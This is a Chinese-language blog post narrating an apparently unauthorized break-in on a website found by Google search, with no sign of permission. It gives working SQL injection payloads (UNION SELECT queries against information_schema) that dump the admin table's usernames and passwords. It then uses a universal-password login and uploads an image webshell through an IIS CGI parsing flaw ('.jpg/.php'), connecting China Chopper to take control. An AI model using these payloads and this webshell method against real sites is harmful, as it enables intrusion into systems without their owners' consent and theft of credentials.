0X00

闲话少说了 直接开始正题。

在使用谷歌语法寻找网站的时候遇到了一个比较

http://xxxxxx.php?id=94

标准的id=94，既然已经遇到了，那么相遇就是缘分自然少不了被测试一遍。

直接 一个单引号 ‘ 测试是字符型，还是数字型。

传入一个简单的单引号后，页面也是直接报错，那么这个地方肯定就是存在SQL注入的。

于是 熟悉的order by 1 正常

Order by 2 直接报错，居然只有一个表

回显点只有一个，那就直接输入 and 1=2 union select database() 数据库直接出现

知道库名以后直接输入表名

And1=2unionselectgroup_concat(table_name)from information_schema.tables where table_schema=database()

出现了tab_admin 这个表，查询这个表里面的字段

And1=2unionselectgroup_concat(column_name)from information_schema.columns where table_name=”tab_admin”

知道字段以后肯定是想要知道里面的数据

And 1=2 union select username from tab_admin

And 1=2 union select password from tab_admin

当知道管理的账户和密码就是想要进入后台看一看（只是看一看哈）

直接使用御剑后台扫描来检测

http://xxxxxx/login.php

0x01

然后就这样登陆这个网站的后台如果我自己的眼光与技术已经到这里结束了

感谢Wenz 兄弟的提醒，还是要检查一下后台有没有GETshell的可能。

万能密码在这里居然也可以使用（简直比靶场还要靶场。。。）

发现一个可以上传照片的功能，图片马直接安排

（这里 一定不能点 提交 ， 点击提交后就会直接发布在目标的网站）

在burp里面把后缀改成php，放包，一个弹窗发现是白名单，只能上传JPG,NPG等图片格式！

是IIS 8.5的版本，所以IIS6.0的三个畸形解析漏洞一直没有考虑，也忘记了威力强大的CGI解析漏洞。

在这里被上了一课，渗透测试一定要去测试所有可能。

随后想起来00截断，但是经过测试也是不能成功，本以为已经到此位置了。

再次经过Wenz兄弟的提醒，想起来了CGI解析漏洞。

因为这个网站

之后就是直接上传一张图片马，这里把图片马上传到他的服务器后，一定不要点击 提交 按钮。点击提交就会直接发送到他的网站首页上面。

把图片的地址复制一下，然后在后面加上/.php 这个CGI的解析漏洞就出现了

http://xxxxxxx53961.jpg/.php?a=phpinfo();

到这里就是可以直接连接菜刀，成功拿到了webshell

在经过看wwwroot目录的时候发现这是一个站群

Cmd看一下权限是一个最低的权限，而且本机一个补丁也没有打，看来也是一个没有经历过社会毒打的人。

对这个站的渗透也到此结束，如果再进行提权就是违规渗透这是不能允许的。